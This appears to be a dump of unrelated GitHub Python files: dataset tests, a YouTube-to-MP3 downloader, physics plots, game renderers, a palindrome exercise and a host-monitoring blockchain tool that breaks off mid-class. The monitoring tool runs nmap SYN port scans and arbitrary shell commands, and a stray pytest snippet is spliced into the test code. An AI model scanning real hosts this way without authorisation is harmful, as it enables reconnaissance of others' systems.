numpy.zeros(44100), fileformat='wav', samplerate=44100)\n assert numpy.all(e.array == 0)\n assert len(e.array) == 44100\n assert e.array.metadata['samplerate'] == 44100\n\ndef test_delete_dataset():\n d = jbof.create_dataset('tmp3')\n jbof.delete_dataset(d)\n with pytest.raises(TypeError):\n d = jbof.DataSet('tmp3')\n\ndef test_delete_item(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n assert len(list(empty_tmp_dataset.all_items())) == 1\n empty_tmp_dataset.delete_item(e)\n assert len(list(empty_tmp_dataset.all_items())) == 0\n\ndef test_delete_array(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item()\n a = e.add_array('tmp', [])\n assert len(list(e.all_arrays())) == 1\n e.delete_array(a)\n assert len(list(e.all_arrays())) == 0\n\ndef test_find_items(empty_tmp_dataset):\n e1 = empty_tmp_dataset.add_item(metadata={'foo': 'bar'})\n e2 = empty_tmp_dataset.add_item(metadata={'foo': 'baz', 'raz':'boo'})\n e3 = empty_tmp_dataset.add_item(metadata={'foo': 'quz'})\n assert set(empty_tmp_dataset.find_items(doesnot='exist')) == set()\n assert set(empty_tmp_dataset.find_items(foo='bar')) == {e1}\n assert set(empty_tmp_dataset.find_items(foo=['bar', 'baz'])) == {e1, e2}\n assert set(empty_tmp_dataset.find_items(foo='quz', raz='boo')) == set()\n\ndef test_hash(empty_tmp_dataset):\n e = empty_tmp_dataset.add_item('tmp')\n e.add_array('tmp', numpy.zeros(5))\n assert '9e9d40c37dc787a96767d314434f4123' == empty_tmp_dataset.calculate_hash()\n\ndef test_readonly(tmp_dataset):\n d = jbof.DataSet(tmp_dataset._directory, readonly=True)\n with pytest.raises(RuntimeError):\n d.add_item()\n with pytest.raises(RuntimeError):\n d.delete_item(d.find_one_item())\n for item in d.all_items():\n with pytest.raises(RuntimeError):\n item.add_array('tmp', [])\n with pytest.raises(RuntimeError):\n item.add_array_from_file('tmp', 'doesnotmatter')\n with pytest.raises(RuntimeError):\n a = list(item.all_arrays())[0]\n item.delete_array(a)\n with pytest.raises(RuntimeError):\n jbof.delete_dataset(d)\n\ndef test_hdf(tmp_dataset):\n jbof.dataset_to_hdf(tmp_dataset, 'tmp.hdf')\n d = jbof.HDFDataSet('tmp.hdf')\n assert d.metadata == {'kind': 'dataset'}\n test_items(d)\n test_arrays(d)\n\n jbof.hdf_to_dataset(d, 
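The fixtures above mix request.addfinalizer with yield; for a single resource like this the two are equivalent, and yield alone reads cleaner because everything after it runs as teardown, pass or fail:

import pytest
import jbof

@pytest.fixture
def tmp_dataset():
    d = jbof.create_dataset('tmp', {'kind': 'dataset'})
    yield d
    jbof.delete_dataset(d)  # teardown: runs after the test, even on failure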
'recreated')\n d = jbof.DataSet('recreated', readonly=False)\n assert d.metadata == {'kind': 'dataset'}\n test_items(d)\n test_arrays(d)\n\n Path('tmp.hdf').unlink()\n jbof.delete_dataset(d)\n\n\ndef test_zip(tmp_dataset):\n with zipfile.ZipFile('tmp.zip', 'w') as f:\n for filename in tmp_dataset._directory.glob('**/*'):\n f.write(filename)\n\n d = jbof.ZIPDataSet('tmp.zip')\n assert d.metadata == {'kind': 'dataset'}\n test_items(d)\n test_arrays(d)\n\n Path('tmp.zip').unlink()\n","repo_name":"bastibe/jbof","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"19689384492","text":"import os\nfrom pytube import YouTube\nfrom moviepy.editor import VideoFileClip\n\n\ndef download_video(url, output_path):\n try:\n # create YouTube object\n yt = YouTube(url)\n\n # select highest resolution stream & download mp4\n video_stream = yt.streams.filter(only_video=False, file_extension=\"mp4\").first()\n video_stream.download(output_path=output_path)\n\n return video_stream.default_filename\n\n except Exception as e:\n print(f\"Error downloading video: {str(e)}\")\n return None\n\n\ndef convert_to_mp3(input_path, output_path):\n try:\n # load mp4\n video = VideoFileClip(input_path)\n\n # convert to mp3\n audio = video.audio\n audio.write_audiofile(output_path)\n audio.close()\n\n return True\n\n except Exception as e:\n print(f\"Error converting to MP3: {str(e)}\")\n return False\n\n\nif __name__ == \"__main__\":\n\n output_dir = \"downloads\"\n\n yt_url = input(\"Enter the YouTube video URL: \")\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n mp4_filename = download_video(yt_url, output_dir)\n if mp4_filename is None:\n print(\"Video download failed.\")\n exit(1)\n\n mp3_filename = mp4_filename.replace(\".mp4\", \".mp3\")\n\n # set source (mp4) & target (mp3) file paths\n mp4_filepath = os.path.join(output_dir, mp4_filename)\n mp3_filepath = os.path.join(output_dir, mp3_filename)\n\n if convert_to_mp3(mp4_filepath, mp3_filepath):\n print(f\"MP3 file saved at {mp3_filepath}\")\n else:\n print(\"Conversion to MP3 failed.\")\n\n os.remove(mp4_filepath)\n","repo_name":"daniel-ferrer/YoutubeToMp3Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27353068141","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nepi_path = input('please input the Data for EPI.xlsx file path here: ')\nxl_file = pd.ExcelFile(epi_path)\n\ndfs = {sheet_name: xl_file.parse(sheet_name)\n for sheet_name in xl_file.sheet_names}\n\ns1 = dfs['Sheet1']\n\n\ndef to1period(period):\n return float(period/10)\n\n\ndef find_t(m, k=31.387962497709545):\n return float(np.pi*2*np.sqrt(float(m/k)))\n\n\nmass = s1['Mass (kg)']\ntrial1 = list(map(to1period, s1['Trial 1 (10)']))\ntrial2 = list(map(to1period, s1['Trial 2 (10)']))\ntrial3 = list(map(to1period, s1['Trial 3 (10)']))\navg = s1['Period Avg']\n\nequation = list(map(find_t, mass))\n\nplt.subplot(1, 2, 1)\nl1 = plt.scatter(mass, trial1, linewidth=0.1, label='trial 1')\nl2 = plt.scatter(mass, trial2, linewidth=0.1, label='trial 2')\nl3 = plt.scatter(mass, trial3, linewidth=0.1, label='trial 3')\nplt.xlabel('mass (kg)')\nplt.ylabel('oscillate period (s)')\nl4 = plt.plot(mass, avg, label='average')\nl5 = plt.plot(mass, equation, color='r', 
linestyle='-.', label='T=2\\u03c0 sqrt(m/k)')\nplt.grid()\nplt.legend()\n\n\ndef find_k(m, t):\n    return float(m/((t/(2*np.pi))**2))\n\n\nplt.subplot(1, 2, 2)\nt1k = list(map(find_k, mass, trial1))\nt2k = list(map(find_k, mass, trial2))\nt3k = list(map(find_k, mass, trial3))\ntak = list(map(find_k, mass, avg))\nconst = np.average(tak)\n# 31.387962497709545\n\nplt.scatter(mass, t1k, linewidth=0.1, label='trial 1')\nplt.scatter(mass, t2k, linewidth=0.1, label='trial 2')\nplt.scatter(mass, t3k, linewidth=0.1, label='trial 3')\nplt.xlabel('mass (kg)')\nplt.ylabel('spring constant (N/m)')\nplt.plot(mass, tak, label='average', color='b')\nplt.axhline(y=const, color='r', linestyle='-.', label='k=m/(T/2\\u03c0)^2')\n\nplt.fill_between(mass, const, tak, color=\"cyan\", alpha=0.25)\n\nplt.legend()\n\nplt.tight_layout()\nplt.show()\n","repo_name":"messizqin/python-matplotlib-graphs","sub_path":"graph/harmonic.py","file_name":"harmonic.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"21244524676","text":"from lutes import System\nimport constants\nimport pyglet\nimport pymunk as pm\n\n\nclass BaseRenderer(System):\n    def __init__(self, window):\n        super().__init__(10)\n        self.window = window\n\n    def convert_pos_to_window(self, vec):\n        (win_x, win_y) = self.window.get_size()\n        x_coef = win_x/constants.FIELD_WIDTH\n        y_coef = win_y/constants.FIELD_HEIGHT\n        return (vec[0]*x_coef, vec[1]*y_coef)\n\n\nclass RectangleRenderer(BaseRenderer):\n    def __init__(self, window):\n        super().__init__(window)\n        self.handled_components = [pm.Poly]\n\n    def update(self, delta):\n        for entity in self.entities:\n            rectangle = self.manager.get_component(entity, pm.Poly)\n            points = []\n            for vec in rectangle.get_vertices():\n                (x, y) = self.convert_pos_to_window((vec.x, vec.y))\n                points.append(x)\n                points.append(y)\n            pyglet.graphics.draw(\n                4,\n                pyglet.gl.GL_QUADS,\n                ('v2f', points)\n            )\n\n\nclass CircleRenderer(BaseRenderer):\n    def __init__(self, window):\n        super().__init__(window)\n        self.handled_components = [pm.Body, pm.Circle]\n\n    def update(self, delta):\n        for entity in self.entities:\n            position = self.manager.get_component(entity, pm.Body).position\n            circle = self.manager.get_component(entity, pm.Circle)\n            # 1.41 is an approximation of sqrt(2)\n            (a_x, a_y) = self.convert_pos_to_window(\n                (position.x - circle.radius*1.41/2,\n                 position.y - circle.radius*1.41/2)\n            )\n            (b_x, b_y) = self.convert_pos_to_window(\n                (position.x - circle.radius*1.41/2,\n                 position.y + circle.radius*1.41/2)\n            )\n            (c_x, c_y) = self.convert_pos_to_window(\n                (position.x + circle.radius*1.41/2,\n                 position.y + circle.radius*1.41/2)\n            )\n            (d_x, d_y) = self.convert_pos_to_window(\n                (position.x + circle.radius*1.41/2,\n                 position.y - circle.radius*1.41/2)\n            )\n            pyglet.graphics.draw(\n                4,\n                pyglet.gl.GL_QUADS,\n                ('v2f', [a_x, a_y, b_x, b_y, c_x, c_y, d_x, d_y])\n            )\n","repo_name":"greizgh/pyng","sub_path":"systems/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3492760067","text":"import sys\nsys.stdin = open('input.txt')\n\ndef search_round(arr):\n    answer = 0\n    for i in range(len(arr)-n+1):\n        text = ''.join(arr[i:i+n]) # take only the n characters starting at index i\n        if text == text[::-1]: # palindrome if text equals its reverse\n            answer += 1\n    return answer\n\n\nT = 10\nfor tc in range(1, T+1):\n    n = int(input())\n    row_arr = [list(map(str, input())) for _ in 
range(8)]\n    len_arr = len(row_arr)\n\n    col_arr = []\n    for i in range(len_arr):\n        a = [row_arr[j][i] for j in range(len_arr)]\n        col_arr.append(a)\n\n    # traverse the rows\n    answer = 0\n    for i in row_arr:\n        answer += search_round(i)\n    # traverse the columns\n    for i in col_arr:\n        answer += search_round(i)\n\n    print(f'#{tc} {answer}')","repo_name":"seniing/TIL","sub_path":"algorithm/SW/SW1215_회문1/1215.py","file_name":"1215.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37132178392","text":"import re\nimport os\nimport csv\nimport time\nimport pickle\nimport shutil\nimport hashlib\nimport argparse\nimport ipaddress\nfrom nacl import signing\nfrom random import choice\nfrom getpass import getuser\nfrom secrets import randbits\nfrom socket import gethostname\nfrom ipaddress import ip_address\nfrom io import BytesIO, BufferedWriter\nfrom base64 import b64encode, b64decode\nfrom pickle import dumps, dump, loads, load\nfrom subprocess import run, CalledProcessError\nfrom time import time, ctime, localtime, strftime\n\nSUPPLIERS = {'m1', 'm2', 'm4'}\nLOGFILE = 'log_m0'\nAUTHORIDGENESIS = 'm0'\nSIGNINGKEYFILEGENESIS = 'signing_key_file_m0'\nSIGNINGKEYFILEPREFIX = 'signing_key_file_'\nVERIFYKEYFILEPREFIX = 'verify_key_file_'\nBLOCKCHAINFILE = 'blockchain_pickle'\nCOMMANDTYPES = {'CmdGeneric', 'CmdPing', 'CmdNmap', 'CmdNetstat', 'CmdLast', 'CmdUfwBlock', 'CmdSshd'}\nCOMMANDTYPESLASTBLOCK = {'CmdLast', 'CmdUfwBlock', 'CmdSshd'} # knowledge of a previous block required\nASSETTYPES = {'Directory', 'FileHashOnly', 'FileWhole', 'FileWholeRemote'}\nASSETTYPESLASTBLOCK = {'Directory', 'FileWhole', 'FileWholeRemote'} # knowledge of a previous block required\n\n\nclass GenericDescriptor:\n    \"\"\" Generic descriptor for class attributes\n\n    Defines the private naming scheme for class attributes.\n\n    \"\"\"\n    def __set_name__(self, owner, attributename):\n        self.public_name = attributename\n        self.private_name = f'_{attributename}'\n    def __get__(self, obj, objtype=None):\n        value = getattr(obj, self.private_name)\n        return value\n    def __set__(self, obj, value):\n        setattr(obj, self.private_name, value)\n\n\nclass FileSystemAssetError(Exception):\n    pass\nclass DirectoryError(Exception):\n    pass\nclass FileHashOnlyError(Exception):\n    pass\nclass FileWholeError(Exception):\n    pass\nclass readassetlistError(Exception):\n    pass\nclass readcommandlistError(Exception):\n    pass\nclass AssetTypeError(Exception):\n    pass\nclass CommandTypeError(Exception):\n    pass\nclass filehashError(Exception):\n    pass\nclass dirlistingError(Exception):\n    pass\nclass cmdnmapError(Exception):\n    pass\nclass cmdnetstatError(Exception):\n    pass\nclass cmdgenericError(Exception):\n    pass\nclass verifyError(Exception):\n    pass\nclass computeblocksigError(Exception):\n    pass\nclass genesisError(Exception):\n    pass\nclass makenextblockError(Exception):\n    pass\nclass addnewblockError(Exception):\n    pass\nclass verifypreviousblockhashError(Exception):\n    pass\nclass cmdlastError(Exception):\n    pass\nclass cmdufwblockError(Exception):\n    pass\nclass cmdsshdError(Exception):\n    pass\nclass summarizeblockError(Exception):\n    pass\nclass checkintegrityError(Exception):\n    pass\nclass blockdataError(Exception):\n    pass\nclass serializeError(Exception):\n    pass\nclass dirassetError(Exception):\n    pass\nclass fileassetError(Exception):\n    pass\nclass filewholeassetError(Exception):\n    pass\nclass commandassetError(Exception):\n    pass\nclass fileassethistError(Exception):\n    pass\nclass 
dirassethistError(Exception):\n    pass\nclass cmdhistError(Exception):\n    pass\nclass FileWholeRemoteError(Exception):\n    pass\nclass filewholeremoteError(Exception):\n    pass\nclass comparehashesError(Exception):\n    pass\nclass blocksbyauthorError(Exception):\n    pass\nclass enumerateassetsError(Exception):\n    pass\nclass assethashchangesError(Exception):\n    pass\nclass dirdiffError(Exception):\n    pass\nclass hashchangesError(Exception):\n    pass\nclass extractallfilehashes(Exception):\n    pass\nclass loadblockchainError(Exception):\n    pass\nclass syncError(Exception):\n    pass\n\n\nclass FileSystemAsset:\n    ''' Base class for assets that are stored in a filesystem\n\n    e.g. files or directories on disk and accessible by path.\n    This class acts as a base class for other subclasses,\n    providing common attributes to the child classes.\n\n    '''\n    assetid = GenericDescriptor()\n    assettype = GenericDescriptor()\n    assetpath = GenericDescriptor()\n\n    def __init__(self, assetid=None, assettype=None, assetpath=None):\n        self.assetid = assetid\n        self.assettype = assettype\n        self.assetpath = assetpath\n        if not os.path.exists(self.assetpath):\n            raise FileSystemAssetError(f'Invalid assetpath \"{self.assetpath}\"')\n\n    def __repr__(self):\n        return f'{self.__class__.__name__}({self.assetid}, {self.assetpath})'\n\n\nclass Directory(FileSystemAsset):\n    ''' FileSystemAssets that are directories\n\n    '''\n    dirlisting = GenericDescriptor()\n    filesindir = GenericDescriptor()\n    dirhashes = GenericDescriptor()\n    dirhash = GenericDescriptor()\n\n    def __init__(self, lastblock=None, **kwds):\n        super().__init__(**kwds)\n        if not os.path.isdir(self.assetpath):\n            raise DirectoryError(f'{self.assetpath} not a directory')\n        # \n        # we need to compute dirhash and compare against last block by author\n        # to see if dirhash has changed. If it has we continue as normal\n        # populating the instance attributes. 
If dirhash has not changed\n # filesindir and dirhashes are set to None, and just the unchanged\n # dirhash is recorded\n\n self.f_dirlisting()\n files, hashlist, directoryhash = self.f_dirhash()\n self.dirhash = directoryhash \n\n try:\n # This authorid has not written a prior block, OR\n # assetid not present in lastblock, OR\n # this assetid's .hash attribute has changed from value in lastblock\n if (lastblock is None or \\\n self.assetid not in lastblock.data.assets or \\\n self.hashchanged(lastblock)):\n self.filesindir = files\n self.dirhashes = hashlist\n\n else:\n self.filesindir = None\n self.dirhashes = None\n\n except:\n raise DirectoryError(f'Error accessing last block by this authorid')\n\n def hashchanged(self, lastblock):\n ''' Check if filehash has changed from last block\n '''\n if not lastblock.genesisblock:\n previousdirhash = lastblock.data.assets[self.assetid].dirhash\n return not self.dirhash == previousdirhash\n\n def f_dirlisting(self):\n \"\"\" Get output of ls -la for the directory asset\n\n This is a record of file metadata (mode, mtime etc).\n This attribute is always populated because currently\n we do not record file metadata any other way.\n\n \"\"\"\n command = []\n command.append('ls')\n command.append('-la')\n command.append('--time-style=long-iso')\n command.append(f'{self.assetpath}')\n try:\n cp = run(command, check=True, capture_output=True, text=True)\n self.dirlisting = cp.stdout\n except CalledProcessError:\n raise dirlistingError(f'Unable to execute ls on {self.assetpath}')\n return None\n\n def f_filesindir(self):\n ''' Computes list of all files in directory\n '''\n files = []\n for direntry in os.scandir(self.assetpath):\n if direntry.is_file():\n files.append(direntry.path)\n return files\n\n def f_dirhashes(self):\n ''' Computes list of (hash, path) for each file in directory\n '''\n hashlist = []\n files = self.f_filesindir()\n for path in files:\n hashlist.append((filehash(path), path))\n return files, hashlist\n\n def f_dirhash(self):\n ''' Compute hash over all the files in a directory\n\n Computes a single hash on a concatenation of each file's hash.\n\n '''\n s = ''\n files, hashlist = self.f_dirhashes()\n for hash, path in hashlist:\n s += hash\n directoryhash = hashlib.sha3_224(bytes.fromhex(s)).hexdigest()\n return files, hashlist, directoryhash\n\n\n\nclass FileHashOnly(FileSystemAsset):\n ''' Files for which we only want the hash\n All monitored file assets have hash recorded\n\n ''' \n hash = GenericDescriptor()\n\n def __init__(self, **kwds):\n super().__init__(**kwds)\n if not os.path.isfile(self.assetpath):\n raise FileHashOnlyError(f'{self.assetpath} not a file')\n self.f_hash()\n\n def f_hash(self):\n self.hash = filehash(self.assetpath)\n return None\n\n\n\nclass FileWhole(FileHashOnly):\n ''' Files for which we record content if hash has changed\n\n This class is an example of an asset type whose instantiation\n depends on knowledge of the last block written by author.\n\n If file hash has changed since lastblock record file contents\n using f_filecontent(), otherwise record just the hash. This class is not\n intended for files that change regularly like logfiles. 
Those files should\n be recorded differently eg tail.\n\n '''\n filecontent = GenericDescriptor()\n\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n\n # This authorid has not written a last block, OR\n # assetid not present in last block, OR\n # this assetid's .hash attribute has changed from value in last block\n try:\n if (lastblock is None or \\\n self.assetid not in lastblock.data.assets or \\\n self.hashchanged(lastblock)):\n\n self.f_filecontent()\n\n else:\n self.filecontent = None\n\n except:\n raise FileWholeError(f'Error accessing last block by this authorid')\n\n def hashchanged(self, lastblock):\n ''' Check if filehash has changed from last block\n '''\n if not lastblock.genesisblock:\n previousfilehash = lastblock.data.assets[self.assetid].hash\n return not self.hash == previousfilehash\n\n def f_filecontent(self):\n try:\n with open(self.assetpath, 'r') as f:\n self.filecontent = f.read()\n except:\n raise FileWholeError(f'Unable to read file content of {self.assetpath}')\n return None\n\n\n\nclass FileWholeRemote(FileHashOnly):\n ''' Remote files for which we record content if hash has changed\n\n Remote file is copied to a local temp file used as target path\n for this class.\n\n '''\n filecontent = GenericDescriptor()\n command = GenericDescriptor()\n\n def __init__(self, lastblock=None, **kwds):\n self.f_remotefile()\n super().__init__(**kwds)\n\n # This authorid has not written a last block, OR\n # assetid not present in last block, OR\n # this assetid's .hash attribute has changed from value in last block\n try:\n if (lastblock is None or \\\n self.assetid not in lastblock.data.assets or \\\n self.hashchanged(lastblock)):\n\n self.f_filecontent()\n\n else:\n self.filecontent = None\n except:\n raise FileWholeRemoteError(f'Error accessing last block by this authorid')\n\n def hashchanged(self, lastblock):\n ''' Check if filehash has changed from last block\n '''\n if not lastblock.genesisblock:\n previousfilehash = lastblock.data.assets[self.assetid].hash\n return not self.hash == previousfilehash\n\n def f_remotefile(self):\n ''' Retrieve remote file and store locally\n '''\n self.command = []\n self.command.append('scp')\n self.command.append('-q')\n self.command.append('m4:/etc/hosts')\n self.command.append('aws_hosts.temp')\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n cmdoutput = cp.stdout\n returncode = cp.returncode\n except CalledProcessError:\n raise FileWholeRemoteError(f'scp execution failed on m4')\n return None\n\n def f_filecontent(self):\n try:\n with open(self.assetpath, 'r') as f:\n self.filecontent = f.read()\n except:\n raise FileWholeRemoteError(f'Unable to read file {self.assetpath}')\n return None\n\n\nclass Command:\n ''' Executable commands to monitor assets\n\n Properties:\n\n commandid: unique id from commandlist\n host: host on which command is executed\n user: user account on host used to execute command\n starttime: start time of execution\n endtime: time command returned\n returncode: return code from executed process\n output: stdout of command\n\n '''\n cmdid = GenericDescriptor()\n cmdtype = GenericDescriptor()\n command = GenericDescriptor()\n starttime = GenericDescriptor()\n endtime = GenericDescriptor()\n returncode = GenericDescriptor()\n cmdoutput = GenericDescriptor()\n\n def __init__(self, cmdid=None, cmdtype=None, command=None):\n self.cmdid = cmdid\n self.cmdtype = cmdtype\n self.command = command\n self.host = 
gethostname()\n self.user = getuser()\n self.starttime = None\n self.endtime = None\n self.returncode = None\n self.cmdoutput = None\n\n # also used by subclasses\n def __repr__(self):\n return f'{self.__class__.__name__}({self.cmdid}, {self.command})'\n\n\nclass CmdGeneric(Command):\n ''' Execute user-specified command and capture output\n\n This command is not tailored by previous invocation\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n self.f_generic()\n\n def f_generic(self):\n kwds = {}\n kwds['shell'] = True\n kwds['executable'] = '/bin/bash'\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdgenericError(f'Unable to execute generic command on {self.host}')\n return None\n\n\nclass CmdNetstat(Command):\n ''' Execute netstat command and capture output\n\n This command is not tailored by previous invocation\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n self.f_netstat()\n\n def f_netstat(self):\n self.command = []\n self.command.append('netstat')\n self.command.append('-tupan')\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdnetstatError(f'Unable to execute netstat on {self.host}')\n return None\n\n\nclass CmdNmap(Command):\n ''' Execute nmap command against target machine\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n self.f_nmap()\n\n def f_nmap(self):\n self.command = []\n self.command.append('nmap')\n self.command.append('-Pn')\n self.command.append('-n')\n self.command.append('-sS')\n self.command.append('--top-ports')\n self.command.append(f'{choice(range(2, 150))}')\n self.command.append('--open')\n self.command.append('10.10.3.2')\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdnmapError(f'Unable to execute nmap on {self.host}')\n return None\n\n\nclass CmdPing(Command):\n ''' container for ping command and output processing functions\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n\n\nclass CmdLast(Command):\n ''' Execute last command and capture output\n\n Records logins to this machine since author's last block.\n Command parameters are tailored by previous invocation\n\n '''\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n self.command = []\n self.command.append('last')\n self.command.append('--ip')\n try:\n # authorid has not written a last block, OR cmdid not present in last block\n if lastblock is None or self.cmdid not in lastblock.data.commands:\n self.f_last()\n else:\n self.command.append('--since')\n self.command.append(f'{strftime(\"%Y%m%d%H%M%S\", localtime(lastblock.unixtime))}')\n self.f_last()\n except:\n raise cmdlastError(f'Error accessing last block by this authorid')\n\n def f_last(self):\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdlastError(f'Unable to execute cmdlast on {self.host}')\n return None\n\n\nclass CmdUfwBlock(Command):\n ''' 
Execute journalctl command to capture UFW BLOCK events\n\n Extracts specified records from journal since last block by author was written.\n This class is an example where we don't catch subprocess.CalledProcessError\n\n '''\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n self.command = []\n self.command.append('journalctl')\n self.command.append('-o')\n self.command.append('short-unix')\n self.command.append('--no-pager')\n self.command.append('-n')\n self.command.append('100000')\n self.command.append('--quiet')\n self.command.append('-g')\n self.command.append('ufw block')\n try:\n # authorid has not written a last block, OR cmdid not present in last block\n if lastblock is None or self.cmdid not in lastblock.data.commands:\n self.f_journalctl()\n else:\n self.command.append('--since')\n self.command.append(f'@{lastblock.unixtime}')\n self.f_journalctl()\n except:\n raise cmdufwblockError(f'Error accessing last block by this authorid')\n\n def f_journalctl(self):\n ''' Executes the constructed journalctl command\n\n Does not raise CalledProcessError for non-zero exit code.\n We expect a non-zero exit code of 1 if there are no new\n specified journal entries. We catch any non-zero exit\n codes other than 1.\n\n '''\n def filteroutput(output):\n ''' Filter journalctl command output as specified herein\n '''\n filteredoutput = ''\n po = re.compile(r'''\n (\\d+\\.\\d+)\n \\s.+\n \\[UFW(\\sBLOCK)\\]\n .+\n (\\sSRC=\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\n (\\sDST=\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\n .+\n (\\sPROTO=\\w+\\sSPT=\\d+\\sDPT=\\d+.+)\n \\n\n ''', flags=re.VERBOSE)\n for m in re.finditer(po, output):\n filteredoutput += ''.join(m.groups()) + '\\n'\n return filteredoutput \n\n kwds = {}\n kwds['check'] = False # set True for testing\n kwds['capture_output'] = True\n kwds['text'] = True\n cp = run(self.command, **kwds)\n self.returncode = cp.returncode\n self.cmdoutput = filteroutput(cp.stdout)\n # self.cmdoutput = cp.stdout\n if self.returncode not in {0, 1}:\n print(f'journalctl returncode = {self.returncode}')\n raise cmdufwblockError(f'Unable to execute cmdjournalctl on {self.host}')\n\n return None\n\n\nclass CmdSshd(Command):\n ''' Execute journalctl command to capture unauthorized ssh connnection attempts\n\n Extracts specified records from journal since last block by author was written.\n This class is an example where we don't catch subprocess.CalledProcessError\n\n '''\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n self.command = []\n self.command.append('journalctl')\n self.command.append('-o')\n self.command.append('short-unix')\n self.command.append('--no-pager')\n self.command.append('-n')\n self.command.append('1000')\n self.command.append('--quiet')\n self.command.append('_SYSTEMD_UNIT=ssh.service')\n try:\n # authorid has not written a last block, OR cmdid not present in last block\n if lastblock is None or self.cmdid not in lastblock.data.commands:\n self.f_journalctl()\n else:\n self.command.append('--since')\n self.command.append(f'@{lastblock.unixtime}')\n self.f_journalctl()\n except:\n raise cmdsshdError(f'Error accessing last block by this authorid')\n\n def f_journalctl(self):\n ''' Executes the constructed journalctl command\n\n Does not raise CalledProcessError for non-zero exit code.\n We expect a non-zero exit code of 1 if there are no new\n specified journal entries. 
We catch any non-zero exit\n codes other than 1.\n\n '''\n def filteroutput(output):\n ''' Filter journalctl output as specified herein\n '''\n filteredoutput = ''\n po = re.compile(r'''\n (\\d+\\.\\d+\\s)\n \\S+\n \\s\n (sshd.+:\\s)\n (Invalid.+|error.+|Unable.+|Disconnecting.+)\n \\n\n ''', flags=re.VERBOSE)\n for m in re.finditer(po, output):\n filteredoutput += ''.join(m.groups()) + '\\n'\n return filteredoutput \n\n kwds = {}\n kwds['check'] = False # set True for testing\n kwds['capture_output'] = True\n kwds['text'] = True\n cp = run(self.command, **kwds)\n self.returncode = cp.returncode\n self.cmdoutput = filteroutput(cp.stdout)\n if self.returncode not in {0, 1}:\n print(f'journalctl returncode = {self.returncode}')\n raise cmdsshdError(f'Unable to execute cmdjournalctl on {self.host}')\n\n return None\n\n\nclass BlockData:\n ''' class for block data\n\n This class defines properties & methods of the data portion of a block.\n This class is implements two dictionaries, assets and commands,\n which hold the data of a block.\n\n Instances of this class become the value of block.data,\n a property of a block instance, Block()\n\n blockdatainstance = BlockData()\n blockinstance = Block()\n blockinstance.data = blockdatainstance\n\n '''\n assets = GenericDescriptor()\n commands = GenericDescriptor()\n\n def __init__(self, assetlist=[], commandlist=[]):\n ''' Instantiate and populate with assets and commands\n\n Called from main()\n\n Input:\n Asset instances parsed from assetlist csv file\n Command instances parsed from commandlist csv file\n\n Output:\n A single blockdata instance for use in construction of a block\n\n '''\n self.assets = {}\n self.commands = {}\n for asset in assetlist:\n self.appendasset(asset)\n for command in commandlist:\n self.appendcommand(command)\n\n def __repr__(self):\n return f'{self.__class__.__name__}({len(self.assets)} assets, {len(self.commands)} commands)'\n\n def appendasset(self, asset):\n ''' Adds an asset instance to blockdata.assets dict\n\n assetid is used as dictionary key\n\n '''\n self.assets[asset.assetid] = asset\n return None\n\n def appendcommand(self, command):\n ''' Adds a command instance to blockdata.commands dict\n\n cmdid is used as dictionary key\n\n '''\n self.commands[command.cmdid] = command\n return None\n\n\nclass Block:\n ''' class for block\n\n This class defines the properties and methods of a block.\n Instances of this class are blocks, stored in a property of blockchain\n\n blockinstance = Block()\n blockchain.blocks.append(blockinstance)\n\n '''\n\n blocknumber = GenericDescriptor()\n authorid = GenericDescriptor()\n previousblockhash = GenericDescriptor()\n genesisblock = GenericDescriptor()\n unixtime = GenericDescriptor()\n datetime = GenericDescriptor()\n tz = GenericDescriptor()\n tzoffset = GenericDescriptor()\n nonce = GenericDescriptor()\n data = GenericDescriptor()\n comment = GenericDescriptor()\n sig = GenericDescriptor()\n\n def __init__(self):\n ''' Construct a skeleton block instance\n '''\n self.blocknumber = None\n self.authorid = None\n self.previousblockhash = None\n self.genesisblock = False\n self.unixtime = None\n self.datetime = None\n self.tz = None\n self.tzoffset = None\n self.nonce = None\n self.data = None\n self.comment = None\n self.sig = None\n\n def 